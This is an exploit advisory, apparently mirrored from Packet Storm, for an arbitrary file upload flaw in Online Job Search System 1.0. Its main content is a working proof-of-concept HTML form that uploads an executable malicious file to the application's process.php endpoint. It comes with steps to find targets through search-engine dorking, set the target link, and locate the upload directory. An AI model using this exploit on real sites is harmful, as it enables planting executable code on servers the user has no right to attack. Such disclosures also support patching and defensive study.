Lucene search
K

Online Job Search System 1.0 Arbitrary File Upload

🗓️ 25 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 268 Views

Online Job Search System 1.0 Remote File Upload Vulnerability, Arbitrary File Upload on Windows 10 and Mozilla Firefox 128.0.

Code
`=============================================================================================================================================  
| # Title : Online Job Search System 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.campcodes.com/downloads/online-job-search-system-using-php-mysql-source-code/?wpdmdl=8545&refresh=66bbf77f15e8c1723594623 |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 10.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Submit Application</title>  
</head>  
<body>  
<h2>Submit Application</h2>  
<form action="http://127.0.0.1/eris/process.php?action=submitapplication&JOBID=2" method="POST" enctype="multipart/form-data">  
<!-- Input for file upload (picture) -->  
<div class="form-group">  
<label for="picture">Upload your picture:</label>  
<input type="file" name="picture" id="picture" required>  
</div>  
  
<!-- Submit button -->  
<div class="form-group">  
<button type="submit">Submit</button>  
</div>  
</form>  
</body>  
</html>  
  
  
[+] path : http://127.0.0.1/eris/applicant/photos  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation